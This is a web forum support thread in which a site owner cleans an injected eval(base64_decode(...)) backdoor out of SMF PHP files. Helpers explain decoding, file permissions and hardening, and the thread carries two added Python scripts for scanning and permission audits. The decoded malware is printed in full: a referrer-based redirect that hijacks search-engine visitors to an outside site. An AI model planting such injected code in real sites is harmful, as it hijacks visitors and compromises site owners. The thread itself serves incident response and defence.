
Author Topic:  at the beginning of php files  (Read 5228 times)

Offline T3CHN0

  • Full Member
  • ***
  • Posts: 630
  • Gender: Male
  • knowledge is power
    • Tarago Pravia Estima
 at the beginning of php files
« on: September 19, 2011, 08:09:04 AM »
Hello


Can anyone tell me what this is in front of my php files.
Display.template.php and load.php so far that's the php files I have noticed it.



Code: [Select]
<?php
/**
 * Simple Machines Forum (SMF)


I am going to remove it so it looks like this



Code: [Select]
<?php
/**
 * Simple Machines Forum (SMF)


I hope I don't get any problems doing so.
but please anyone let me know
Code: [Select]
if 

should it be in my files


cheers

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re:  at the beginning of php files
« Reply #1 on: September 19, 2011, 08:33:17 AM »
No, it shouldn't be in your files at all.
It's fine to remove these chars.

Did you install any mod?


Take a peek at what I'm doing! ;D



Need support in Italian?

Help us help you: explain your problem well: no, "it doesn't work" is not an explanation!!
1) What you do,
2) what you expect,
3) what you get.

Offline T3CHN0

 at the beginning of php files & eval(base64_decode("ZXJyb3Jfcm
« Reply #2 on: September 19, 2011, 11:48:04 AM »
Hello
Yes, I have installed many mods. My forum was attacked by a leeching rogue and all my files had
something like this at the beginning of each php file

Code: [Select]
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQo

directly after <?php

I upgraded my site from 2.0 rc3 to 2.0 last week but was attacked again 2 days after.
So I rebuilt the whole 2.0 forum again fresh with a new install but after removing
Code: [Select]


within about 30 minutes I noticed files started having the
Code: [Select]
eval(base64_decode(

again and not long after every php file I edit was leeched again.

I have turned on leech security with my host to try to stop this from happening again
but any other ideas to protect my site would be appreciated

at this point in time I am going over every file in my forum 1 by 1 and removing the leech string
to try and recover my forum without having to rebuild another time.


cheers

kat

  • Guest
Re:  at the beginning of php files
« Reply #3 on: September 19, 2011, 12:20:00 PM »
Maybe... This?

http://custom.simplemachines.org/mods/index.php?mod=2815

I'm curious as to how they keep getting in, though.

Has your host checked their access logs and stuff?

Are they a good host?

Offline T3CHN0

Re:  at the beginning of php files
« Reply #4 on: September 19, 2011, 12:46:00 PM »
Thank you so much for that link to the firewall mod, never thought of searching for a firewall mod

I'm with bluehost and I have never had a problem with them in the past.
good speeds and a lot of room for data.


they probably haven't checked access logs and stuff, am I able to do it?

how they keep getting in "Well only a matter of time before a hack is made" that's what we can expect
with anything in our days. I don't know how but it keeps getting in.

I do set all my files permissions to 755 - would that allow access?

here is the complete leech string, if anyone knows how to decode it and find out where it's directed at
Code: [Select]
eval(base64_decode("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"));

MrPhil

  • Guest
Re:  at the beginning of php files
« Reply #5 on: September 19, 2011, 12:51:19 PM »
Change "eval" to "print" and it should display the code inside, rather than running it. You probably won't like what you see, but it might give you a hint as to how they're getting in. Not only should you clean up all SMF files, but erase all other files on your site that you can't account for. Scan all PCs used to administer your site for spyware and viruses (especially keystroke loggers and password sniffers). Then change all passwords -- FTP, site control panel, SMF admin IDs, etc. Talk to your host about access logs and see if they can see someone getting in.
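Added example, not part of any post in this thread: a Python sketch of the cleanup check discussed above. It flags PHP files that carry stray bytes before `<?php` or an injected `eval(base64_decode("..."))` statement, and decodes the payload for reading without running it. The file names, the sample payload and the stray bytes are constructed for the demo.

```python
import base64
import re
import tempfile
from pathlib import Path

# The injected statement described in the thread, plus the rest of its line.
INJECT = re.compile(
    rb"""eval\s*\(\s*base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*;?[ \t]*\r?\n?""")

def scan_file(path):
    """Return a finding for one PHP file, or None when nothing matches."""
    data = Path(path).read_bytes()
    start = data.find(b"<?php")
    stray = data[:start] if start > 0 else b""   # bytes in front of the opening tag
    match = INJECT.search(data)
    if not (match or stray):
        return None
    payload = None
    if match:
        # Static decode only: the payload is shown, never executed.
        payload = base64.b64decode(match.group(2)).decode("latin-1")
    return {"path": str(path), "stray": stray, "payload": payload}

def scan_tree(root):
    """Scan every *.php file below root and return the findings."""
    return [f for p in sorted(Path(root).rglob("*.php")) if (f := scan_file(p))]

def clean_bytes(data):
    """Drop bytes before <?php and every injected eval(base64_decode(...)) line."""
    start = data.find(b"<?php")
    if start > 0:
        data = data[start:]
    return INJECT.sub(b"", data)

def demo():
    """Run against two constructed files: one infected, one clean."""
    payload = base64.b64encode(b"error_reporting(0); /* constructed sample */")
    clean = b"<?php\n/**\n * Simple Machines Forum (SMF)\n"
    infected = (b"\xef\xbb\xbf" + b'<?php\neval(base64_decode("' + payload
                + b'"));\n' + clean[6:])
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "Display.template.php").write_bytes(infected)
        Path(tmp, "Load.php").write_bytes(clean)
        return scan_tree(tmp), clean_bytes(infected) == clean

if __name__ == "__main__":
    findings, restored = demo()
    for f in findings:
        print(f["path"], f["stray"], repr(f["payload"]))
    print("cleaned copy matches original:", restored)
```

Review the findings before rewriting anything, and compare cleaned files against a fresh copy of the same SMF version where one is available.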

Offline T3CHN0

Re:  at the beginning of php files
« Reply #6 on: September 19, 2011, 12:59:24 PM »
Thanks.
I will do all of what you said.


by the way, where would I put the string with print to see anything.
in an empty php file?

Offline T3CHN0

Re:  at the beginning of php files
« Reply #7 on: September 19, 2011, 01:26:43 PM »
don't know if this info is any good.
but cleaning my files and I'm back in my themes/default folder and see
Code: [Select]
 is back in my Display.template.php file
that means whatever it is will keep coming back.


How do I stop that happening?

kat

  • Guest
Re:  at the beginning of php files
« Reply #8 on: September 19, 2011, 01:30:38 PM »
Quote
I do set all my files permissions to 755 - would that allow access?

I believe that is like having a big notice on your site saying "Please hack me!". (Well, not quite that bad, but...)

Go to Admin>Packages>File permissions.

Set that to "Standard" and I think you'll be better off.

Offline Illori

  • Project Manager
  • SMF Legend
  • *
  • Posts: 51,412
Re:  at the beginning of php files
« Reply #9 on: September 19, 2011, 02:13:03 PM »
K@ no, 777 is world write/readable 755 is not.

kat

  • Guest
Re:  at the beginning of php files
« Reply #10 on: September 19, 2011, 02:22:07 PM »
Yeah, I know.

Would you leave your forum with every file at 775, though?

Offline Illori

Re:  at the beginning of php files
« Reply #11 on: September 19, 2011, 02:24:07 PM »
they said 755 not 775, 755 is REQUIRED by many servers that are more _secure_. 755 keeps others from being able to view your folders, but files need to be 644 not 755.

MrPhil

  • Guest
Re:  at the beginning of php files
« Reply #12 on: September 19, 2011, 02:30:09 PM »
Quote
by the way, where would I put the string with print to see anything.
in an empty php file?

Code: [Select]
<?php
print(base64_decode("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"));
?>


MrPhil

  • Guest
Re:  at the beginning of php files
« Reply #13 on: September 19, 2011, 02:31:30 PM »
Quote
they said 755 not 775, 755 is REQUIRED by many servers that are more _secure_. 755 keeps others from being able to view your folders, but files need to be 644 not 755.

K@ needs a new pair of reading glasses...

kat

  • Guest
Re:  at the beginning of php files
« Reply #14 on: September 19, 2011, 02:54:25 PM »
You're right, there.

I DID read it as 775.

I blame Runic for late nights in wet fields. ;)

Offline T3CHN0

Re:  at the beginning of php files
« Reply #15 on: September 19, 2011, 07:38:42 PM »
Quote
755 keeps others from being able to view your folders, but files need to be 644 not 755.

So simply, all folders should be 755 and all php files 644


I still can't go to Admin>Packages>File permissions to set file permissions as my forum is still down.
I will do the permissions myself.

I have almost finished removing all leeches and will put my new user name and password
into settings soon to test it and see if my forum is working again.
« Last Edit: September 19, 2011, 07:41:53 PM by techno489 »
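Added example, not part of any post in this thread: a Python sketch that audits a forum directory against the modes given above (folders 755, files 644), marks anything world-writable, and can reset the deviations. It assumes a POSIX host where you own the files; the directory layout in the demo is constructed.

```python
import os
import stat
import tempfile
from pathlib import Path

DIR_MODE, FILE_MODE = 0o755, 0o644  # the targets given in the thread

def audit_permissions(root):
    """List every directory or file under root whose mode differs from the target."""
    issues = []
    for path in [Path(root), *sorted(Path(root).rglob("*"))]:
        info = path.lstat()
        if stat.S_ISLNK(info.st_mode):
            continue  # skip symlinks; their own mode bits are not what is checked
        mode = stat.S_IMODE(info.st_mode)
        wanted = DIR_MODE if stat.S_ISDIR(info.st_mode) else FILE_MODE
        if mode != wanted:
            issues.append({"path": str(path), "mode": mode, "wanted": wanted,
                           "world_writable": bool(mode & stat.S_IWOTH)})
    return issues

def fix_permissions(issues):
    """Apply the wanted mode to each reported path."""
    for issue in issues:
        os.chmod(issue["path"], issue["wanted"])

def demo():
    """Build a constructed forum tree with two wrong modes, audit, fix, re-audit."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp, "forum")
        sources = root / "Sources"
        sources.mkdir(parents=True)
        (root / "index.php").write_text("<?php\n")
        (sources / "Load.php").write_text("<?php\n")
        os.chmod(root, 0o755)
        os.chmod(sources, 0o777)               # world-writable directory
        os.chmod(root / "index.php", 0o644)
        os.chmod(sources / "Load.php", 0o755)  # the "every file at 755" case
        before = [(Path(i["path"]).name, oct(i["mode"]), i["world_writable"])
                  for i in audit_permissions(root)]
        fix_permissions(audit_permissions(root))
        return before, audit_permissions(root)

if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after fix:", after)
```

Some hosts need different modes for writable folders such as attachments or cache, so check the audit output before calling `fix_permissions` on a live tree.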

Offline T3CHN0

Re:  at the beginning of php files
« Reply #16 on: September 20, 2011, 01:15:24 AM »
Quote
by the way, where would I put the string with print to see anything.
in an empty php file?
Code: [Select]
<?php
print(base64_decode("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"));
?>



I did this and this is what I got.
means nothing to me


Code: [Select]
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google")
            or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo")
            or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma")
            or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net")
            or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly")
            or stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com")
            or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                header("Location: http://prsnbrk.osa.pl/");
                exit();
            }
        }
    }
}

Well I did everything said. forum firewall installed and forum back up and running with all leeching removed.
I will monitor my site as always and if anything happens like this again I will reply
and post to the thread if that's ok


cheers

MrPhil

  • Guest
Re:  at the beginning of php files
« Reply #17 on: September 20, 2011, 12:22:52 PM »
Quote
I did this and this is what I got.
means nothing to me

It means that if any of many popular search engines sent someone to your site, what they will see is some Polish site instead. You've been hijacked.

Offline T3CHN0

Re:  at the beginning of php files
« Reply #18 on: September 20, 2011, 01:53:51 PM »
WOW. thanks for that... hopefully with forum firewall mod, Bad Behavior mod, stop spammers mod, and leech protection from
my host that none of this will happen again...

Offline Illori

Re:  at the beginning of php files
« Reply #19 on: September 20, 2011, 01:55:12 PM »
that will only work if the code you are using is secure and your server is secure. those mods alone will not stop hackers.

kat

  • Guest
Re:  at the beginning of php files
« Reply #20 on: September 20, 2011, 01:58:40 PM »
Ultimately, your best defence is to read my sig... ;)

It won't stop the buggers, obviously.

But, if they DO screw your forum, you can go :P and put it straight back. :)